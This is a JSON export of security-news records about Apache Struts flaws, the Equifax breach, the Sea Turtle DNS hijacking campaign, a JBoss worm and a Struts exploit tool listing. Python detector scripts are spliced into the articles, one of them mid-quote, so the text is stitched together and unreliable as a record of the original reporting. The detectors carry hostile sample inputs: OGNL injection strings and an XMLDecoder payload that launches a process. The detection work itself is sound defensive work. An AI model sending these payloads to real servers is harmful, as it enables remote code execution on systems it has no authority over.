Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. 
In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes their independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes a week after the company announced its chief information officer David Webb and chief security officer Susan Mauldin would also be retiring.\n\nDespite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). 
On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "cvss3": {}, "published": "2017-09-26T14:28:26", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as 
[CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source web application framework widely used by developers and companies to build Java-based applications. Both of the exploitable vulnerabilities in question were fixed last November.\n\nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expression that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is an expression language for Java; when attacker-controlled input is evaluated as an OGNL expression, it can be used to reach the application\u2019s data objects and to inject code that runs on the server.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. 
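Both the WebLogic XMLDecoder issue described earlier on this page and the Struts OGNL injection described here share a property a defender can use: the attacker-supplied input has a shape that legitimate traffic never has (an XMLEncoder document inside a SOAP envelope; `%{`/`${` delimiters or `#_memberAccess`/`#context` handles in a URL, parameter or header). The following Python is an added example, not code from the Apache Struts project, Oracle, or the Vulmap tool: a coarse request inspector that percent-decodes repeatedly (so a double-encoded header does not slip past) and reports which family of marker it saw. The request dict layout, the sample requests and the marker lists are assumptions for this example; the markers are WAF-style signatures and will need tuning against your own traffic before use.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# OGNL/Struts expression delimiters and the context/member-access handles that
# published Struts exploit chains manipulate. Coarse by design.
OGNL_RE = re.compile(
    r"%\{|\$\{|#_memberAccess|#context|@ognl\.|@java\.lang\.",
    re.IGNORECASE,
)

# XMLEncoder output (what java.beans.XMLDecoder consumes) has a recognisable
# shape: a <java> root and <void method=...>/<void class=...> elements.
XMLDECODER_RE = re.compile(
    r"java\.beans\.XMLDecoder|<java\b|<void\s+(?:method|class)=",
    re.IGNORECASE,
)

# Constructed sample requests (not captured traffic). Index 0 and 2 carry OGNL
# markers (2 is double percent-encoded in a header), 1 carries an XMLEncoder
# document in a SOAP header, 3 and 4 are clean.
SAMPLE_REQUESTS: List[Dict] = [
    {"method": "GET", "path": "/struts/index.action",
     "query": "id=%25%7B%28%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29%7D",
     "headers": {}, "body": ""},
    {"method": "POST", "path": "/ws/service", "query": "",
     "headers": {"Content-Type": "text/xml"},
     "body": '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header>'
             '<java version="1.8" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder">'
             '<array class="java.lang.String" length="1"><void index="0"><string>id</string></void></array>'
             '<void method="start"/></object></java></soapenv:Header><soapenv:Body/></soapenv:Envelope>'},
    {"method": "POST", "path": "/upload.action", "query": "",
     "headers": {"Content-Type": "%2525%257B%2523context%255B%2527xwork.MethodAccessor.denyMethodExecution%2527%255D%253Dfalse%257D"},
     "body": ""},
    {"method": "GET", "path": "/index.action", "query": "name=alice&page=2", "headers": {}, "body": ""},
    {"method": "POST", "path": "/ws/service", "query": "",
     "headers": {"Content-Type": "text/xml"},
     "body": '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
             '<soapenv:Body><getUser><id>42</id></getUser></soapenv:Body></soapenv:Envelope>'},
]


def deep_unquote(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), defeating double encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(req: Dict) -> str:
    """Return 'xmldecoder', 'ognl' or '' for one request."""
    body = req.get("body", "")
    if XMLDECODER_RE.search(body):
        return "xmldecoder"
    # Every attacker-controlled surface: path, query, body and all header values.
    surface = [req.get("path", ""), req.get("query", ""), body]
    surface.extend(req.get("headers", {}).values())
    if any(OGNL_RE.search(deep_unquote(part)) for part in surface):
        return "ognl"
    return ""


def inspect_all(requests: List[Dict]) -> List[Dict]:
    findings = []
    for index, req in enumerate(requests):
        reason = inspect_request(req)
        if reason:
            findings.append({"index": index, "reason": reason,
                             "method": req["method"], "path": req["path"]})
    return findings


if __name__ == "__main__":
    for finding in inspect_all(SAMPLE_REQUESTS):
        print(f"#{finding['index']} {finding['method']} {finding['path']}: {finding['reason']}")
```

Checking headers, not just the URL, matters because the Struts flaw behind the Equifax breach mentioned above was triggered through a request header rather than a parameter; the bounded decode loop exists because an unbounded one on attacker input is itself a denial-of-service vector.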
Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability lets an attacker alter the write permissions of uploaded files and directories, which can lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Struts Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and that they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-24T11:42:41", "description": "A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) \u2013 and elsewhere \u2013 with domain name system (DNS) hijacking attacks, used to scoop up credentials.\n\nThe campaign, dubbed \u201cSea Turtle\u201d by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.\n\nAt least 40 different organizations across 13 countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars, are being targeted in the U.S. 
and Sweden.\n\nResearchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: \u201cWhile this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system,\u201d they said.\n\n## The Campaign\n\nThe campaigns have been utilizing DNS hijacking attacks, a type of attack where an individual redirects traffic meant to go to a legitimate website to a malicious server \u2014 meaning that they could easily harvest website credentials and other sensitive data that users are sharing with web forms and the like.\n\nSince 2017, more than 40 firms have been compromised by the Sea Turtle attacks \u2013 including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)\n\nIn addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain registry, such as country code top-level domains and generic top-level domains. 
Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.\n\nThe campaign has been \u201chighly successful,\u201d researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, and traditional security products aren\u2019t designed to monitor DNS requests: \u201cThe threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought,\u201d researchers said.\n\n## The Attacks\n\nThe attackers gained initial access either through spear-phishing emails or through exploiting known flaws.\n\nThe phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization\u2019s DNS records with the registrant\u2019s credentials.\n\nAlternatively, the attackers exploited known vulnerabilities \u2013 including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code exploit for the Cisco integrated services router 2811 (CVE-2017-6736) and the infamous \u201cDrupalgeddon\u201d remote code execution Drupal glitch (CVE-2018-7600).\n\nA list of CVEs used by the attacker is below \u2013 but researchers say that they believe the list is incomplete and \u201cthe actor in question can leverage known vulnerabilities as they encounter a new threat surface.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)\n\nOnce they gained access to a network, an attacker would access the DNS registry and modify the name server records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries \u2013 allowing them to trick users into giving up their credentials.\n\n\u201cThe amount of time that the targeted DNS record was hijacked can range from a couple of minutes 
to a couple of days,\u201d researchers said. \u201cThis type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world.\u201d\n\nThe threat actors also used an array of techniques to evade detection, researchers said.\n\nFor instance, once users put their credentials into impersonated services, they would then be passed to the legitimate service, and couldn\u2019t tell that anything was wrong.\n\nAttackers also used an interesting technique called certificate impersonation, where attackers stole a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization \u2013 making the web browser seem more legitimate.\n\n## Other Campaigns\n\nResearchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems \u2013 but stayed mum on who exactly that actor was.\n\n\u201cThis is the first time Cisco Talos is documenting operations conducted by this threat actor,\u201d Craig Williams, director of Talos Outreach at Cisco, told Threatpost. 
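The hijack sequence described above (delegation records rewritten at the registry, victims steered to an actor-controlled resolver, and a freshly issued certificate from a different CA so the browser shows no warning) changes externally observable state that a defender can watch for, which is also where the registry-lock and monitoring advice later on this page lands in practice. The following Python is an added example, not code from Cisco Talos or from the Vulmap project: it compares a baseline snapshot of a name with a later observation and raises graded alerts. It assumes a monitoring job that already fills the snapshot fields (NS delegation from the parent zone, A records, the SHA-256 and issuer of the TLS leaf certificate on port 443, and EPP status codes from RDAP or WHOIS, where a registry lock appears as the `server*Prohibited` codes); the domain names, addresses and fingerprints are constructed.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set


@dataclass
class DomainSnapshot:
    """What one monitoring run records for a name (field sources are assumptions, see lead-in)."""
    ns: Set[str]                 # delegation (NS) names as returned by the parent zone
    a: Set[str]                  # A records served for the name
    cert_sha256: str             # SHA-256 of the leaf certificate presented on 443
    cert_issuer: str             # issuer DN of that certificate
    registrar_locks: Set[str] = field(default_factory=set)  # EPP status codes from RDAP/WHOIS


ISSUER = "C=US, O=Example Trust, CN=Example Issuing CA 1"
LOCKS = {"serverTransferProhibited", "serverUpdateProhibited", "serverDeleteProhibited"}
GOOD_NS = {"ns1.example.org.", "ns2.example.org."}

# Constructed baseline and later observation; fingerprints are shortened placeholders.
BASELINE: Dict[str, DomainSnapshot] = {
    "mail.example.org": DomainSnapshot(GOOD_NS, {"198.51.100.10"}, "3b1f9e0c", ISSUER, set(LOCKS)),
    "www.example.org": DomainSnapshot(GOOD_NS, {"198.51.100.20"}, "9c2a44d1", ISSUER, set(LOCKS)),
    "api.example.org": DomainSnapshot(GOOD_NS, {"198.51.100.30"}, "51d07ab3", ISSUER, set(LOCKS)),
}
OBSERVED: Dict[str, DomainSnapshot] = {
    # Delegation moved, new address, new certificate from another CA, update lock gone.
    "mail.example.org": DomainSnapshot(
        {"ns1.resolver-svc.example.", "ns2.resolver-svc.example."}, {"203.0.113.7"},
        "e77b2c90", "C=US, O=Other Trust Services, CN=Other DV CA R3",
        {"serverTransferProhibited", "serverDeleteProhibited"}),
    # Routine re-addressing: same delegation (different letter case), same cert, same locks.
    "www.example.org": DomainSnapshot(
        {"NS1.EXAMPLE.ORG", "NS2.EXAMPLE.ORG"}, {"198.51.100.21"}, "9c2a44d1", ISSUER, set(LOCKS)),
    # api.example.org produced no observation on this run (lookup failed or timed out).
}


def _norm(names: Set[str]) -> Set[str]:
    """DNS names are case-insensitive and may or may not carry the trailing dot."""
    return {n.lower().rstrip(".") for n in names}


def detect_hijack(baseline: Dict[str, DomainSnapshot],
                  observed: Dict[str, DomainSnapshot]) -> List[Dict]:
    """Compare every baselined name with its latest observation and return graded alerts."""
    alerts: List[Dict] = []

    def alert(domain: str, check: str, severity: str, detail: str) -> None:
        alerts.append({"domain": domain, "check": check, "severity": severity, "detail": detail})

    for domain, base in baseline.items():
        now = observed.get(domain)
        if now is None:
            # A missing observation is itself a signal: do not let the check fail silently.
            alert(domain, "no_observation", "high", "name did not resolve or the check failed")
            continue
        if _norm(base.ns) != _norm(now.ns):
            alert(domain, "ns_changed", "high", f"{sorted(_norm(base.ns))} -> {sorted(_norm(now.ns))}")
        if base.a != now.a:
            alert(domain, "a_changed", "medium", f"{sorted(base.a)} -> {sorted(now.a)}")
        if base.cert_sha256 != now.cert_sha256:
            # A renewal from the same issuer is routine; a new issuer is the impersonation pattern.
            severity = "high" if base.cert_issuer != now.cert_issuer else "low"
            alert(domain, "cert_changed", severity, f"issuer {base.cert_issuer!r} -> {now.cert_issuer!r}")
        missing = base.registrar_locks - now.registrar_locks
        if missing:
            alert(domain, "locks_removed", "high", ", ".join(sorted(missing)))
    return alerts


if __name__ == "__main__":
    for a in detect_hijack(BASELINE, OBSERVED):
        print(f"{a['severity']:6} {a['domain']:18} {a['check']:15} {a['detail']}")
```

The NS comparison is done against the parent zone's delegation rather than against the zone's own NS answer, because a hijacked delegation will happily serve a self-consistent NS set; and a certificate change is only escalated when the issuer changes too, which is the signature of the certificate impersonation technique described above rather than of an ordinary renewal.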
\u201cWhile we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution.\u201d\n\nDNS-based attacks are an increasing worry for governments and enterprises alike.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)\n\nDNS Hijack Attack Vector\n\n[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security ordered all federal agencies to urgently audit DNS security for their domains within 10 business days.\n\nAlso [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, the Middle East and North Africa was linked to Iran. The attacks, which were related to a campaign dubbed \u201cDNSpionage\u201d by Cisco Talos researchers, had a high degree of success harvesting targets\u2019 credentials, according to the firm.\n\nHowever, Talos researchers said they assess with high confidence that the DNSpionage operations are \u201cdistinctly different and independent\u201d from the Sea Turtle campaign.\n\n\u201cThe report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations,\u201d Williams told Threatpost. \u201cDNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns\u2019 level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims. 
Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups.\u201d\n\nTo protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service, multi-factor authentication (to access DNS records), and of course staying up to date on patches, especially on internet-facing machines.\n\nHowever, \u201conce these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked,\u201d he told Threatpost.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. 
They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-17T17:32:06", "type": "threatpost", "title": "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2017-6736", "CVE-2018-7600", "CVE-2020-1938"], "modified": "2019-04-17T17:32:06", "id": "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "href": "https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:04:36", "description": "[](<https://threatpost.com/jboss-worm-exploiting-old-bug-infect-unpatched-servers-102111/>)There is a new worm circulating right now that is compromising servers running older versions of the JBoss Application Server and then adding them to a botnet. The worm also attempts to install a remote access tool in order to give the attacker control over the newly infected server.\n\nThe worm has been circulating for a couple of days at least, and it\u2019s not clear right now how many servers have been compromised or what the origins of it are. It apparently exploits an old vulnerability in the JBoss Application Server, which was patched in April 2010, in order to compromise new machines. Once that\u2019s accomplished, the worm begins a post-infection routine that includes a number of different steps.\n\nOne user who found the worm\u2019s payload on a honeypot machine he controls posted a message to Pastebin saying that the payload includes a variety of Perl scripts, one of which immediately connects a newly infected machine to an IRC server, effectively adding it to a botnet of other compromised JBoss servers. 
The payload also installs a RAT for future use by the attacker.\n\n\u201cI explored the contents of the malicious payload left and it contained Perl Scripts to automatically connect the compromised host to an IRC Server and be part of a BOTNET, install and run a remote access tool using dyndns (Flu.pl), and two Windows batch scripts, one is for exploring JBOSS Services (wstools.bat) and a script to discover all UDP\u2013based members running on a certain mcast address (JGroups) called \u201cJGroups Cluster Discovery Script for Win32\u201d (probe.bat),\u201d the user wrote in his analysis of the [JBoss worm](<http://pastebin.com/U7fPMxet>). \n\nOfficials at Red Hat, which provides paid support for the open-source JBoss software, said that the vulnerability the worm exploits has been patched for more than a year and a half and users running outdated versions of the JBoss Application Server should patch their installations immediately.\n\n\u201cRed Hat has become aware of a worm currently affecting unpatched or unsecured servers running JBoss Application Server and products based on it. This worm propagates by connecting to unprotected JMX consoles, then uses the ability of the JMX console to execute arbitrary code in the context of the JBoss user,\u201d wrote [Mark Cox](<http://community.jboss.org/blogs/mjc/2011/10/20/statement-regarding-security-threat-to-jboss-application-server>), Red Hat\u2019s director of security response. \u201cThe worm affects users of JBoss Application Server who have not correctly secured their JMX consoles as well as users of older, unpatched versions of JBoss enterprise products. 
An update to JBoss enterprise products was produced in April 2010 to correct the flaw, [CVE-2010-0738](<https://access.redhat.com/kb/docs/DOC-30741>).\u201d\n\nThere are instructions for [securing the JMX console](<http://community.jboss.org/wiki/SecureTheJmxConsole>) on the Red Hat site.\n", "cvss3": {}, "published": "2011-10-21T11:50:17", "type": "threatpost", "title": "JBoss Worm Exploiting Old Bug to Infect Unpatched Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0738"], "modified": "2013-04-17T16:33:32", "id": "THREATPOST:C31AD5F136E72DC9D06EECC9D1791450", "href": "https://threatpost.com/jboss-worm-exploiting-old-bug-infect-unpatched-servers-102111/75784/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "kitploit": [{"lastseen": "2023-12-04T15:31:19", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nApache-Struts-v3 is a script that combines exploits for three RCE vulnerabilities in Apache Struts and can also drop a server-side shell on a compromised host. 
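The three input surfaces this script abuses (a prefixed request parameter, the Content-Type header, and an expression in the URL path) are also what a defender should watch for in front of a Struts application. The following is an added example, not code from the Apache-Struts-v3 project or the kitploit post: a request-inspection routine that flags each surface over constructed sample traffic, suitable for a WAF rule, a proxy-log review or a unit test. The request dict layout, the header, prefix and path patterns, and the sample requests are my assumptions, drawn from the CVE descriptions on this page and the public Struts advisories S2-016, S2-045/S2-046 and S2-057.

```python
# Added example: request-inspection checks for the three Struts input
# surfaces listed on this page. Not part of the Apache-Struts-v3 script.
# Assumed request layout: dicts with "method", "path", "headers", "params".
import re
from urllib.parse import unquote

# OGNL expression delimiters that Struts evaluates; "%{" or "${" in a
# header, a parameter prefix or a URL path segment is never legitimate
# client input for a normal application.
OGNL_MARKER = re.compile(r"[%$]\{")

# CVE-2013-2251 (S2-016): parameter names with these prefixes were handed to
# OGNL evaluation by DefaultActionMapper.
PREFIXES = ("action:", "redirect:", "redirectAction:")


def _decode(value: str) -> str:
    """Percent-decode twice so %2524%257B (double-encoded "${") is caught."""
    return unquote(unquote(value))


def inspect_request(req: dict) -> list:
    """Return (cve, reason) tuples for one request; an empty list means clean."""
    findings = []
    # CVE-2017-5638 (S2-045/S2-046): OGNL in Content-Type (or the multipart
    # Content-Disposition) reaches the Jakarta multipart parser's error
    # message, where it is evaluated.
    for name, value in req.get("headers", {}).items():
        if name.lower() in ("content-type", "content-disposition") and OGNL_MARKER.search(_decode(value)):
            findings.append(("CVE-2017-5638", f"OGNL marker in {name} header"))
    # CVE-2013-2251: prefixed parameter names, whether or not they also
    # carry an expression.
    for name in req.get("params", {}):
        decoded = _decode(name)
        if decoded.startswith(PREFIXES):
            prefix = decoded.split(":", 1)[0] + ":"
            findings.append(("CVE-2013-2251", f"prefixed parameter {prefix}"))
    # CVE-2018-11776 (S2-057): OGNL in the namespace part of the URL, i.e.
    # any path segment; legitimate Struts URLs never contain these markers.
    segments = [s for s in _decode(req.get("path", "")).split("/") if s]
    if any(OGNL_MARKER.search(seg) for seg in segments):
        findings.append(("CVE-2018-11776", "OGNL marker in URL path segment"))
    return findings


# Constructed sample traffic (not captured from any real system).
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/struts2-showcase/index.action",
     "headers": {"Content-Type": "text/html"}, "params": {"q": "hello"}},
    {"method": "POST", "path": "/struts2-showcase/upload.action",
     "headers": {"Content-Type": "%{#probe}; multipart/form-data"}, "params": {}},
    {"method": "GET", "path": "/struts2-showcase/index.action",
     "headers": {}, "params": {"redirect:${1+1}": ""}},
    {"method": "GET", "path": "/struts2-showcase/%24%7B1%2B1%7D/actionChain1.action",
     "headers": {}, "params": {}},
]


def scan(requests: list) -> dict:
    """Map request index to its findings, omitting clean requests."""
    result = {}
    for i, req in enumerate(requests):
        findings = inspect_request(req)
        if findings:
            result[i] = findings
    return result


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS).items():
        for cve, reason in findings:
            print(f"request {i}: {cve} ({reason})")
```

The double decode matters: a single-pass rule is trivially bypassed with `%25%7B`, and a Struts action mapper sees the decoded form. The checks are deliberately pattern-level (delimiters and prefixes rather than full payload signatures), so they catch variants the script's own payloads do not use; the cost is that any legitimate parameter name starting with `redirect:` will also be flagged, which on a Struts 2 deployment is exactly the behaviour you want.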
\n \n**SHELL** (web shell the script can drop on the target) \n**php** `finished` \n**jsp** `in progress` \n \n**CVEs COVERED** (with the request surface each one is triggered through) \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction:' parameter prefixes` \n**CVE-2017-5638** `Content-Type header` \n**CVE-2018-11776** `'redirect:' and 'redirectAction:' results, triggered through a crafted URL` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 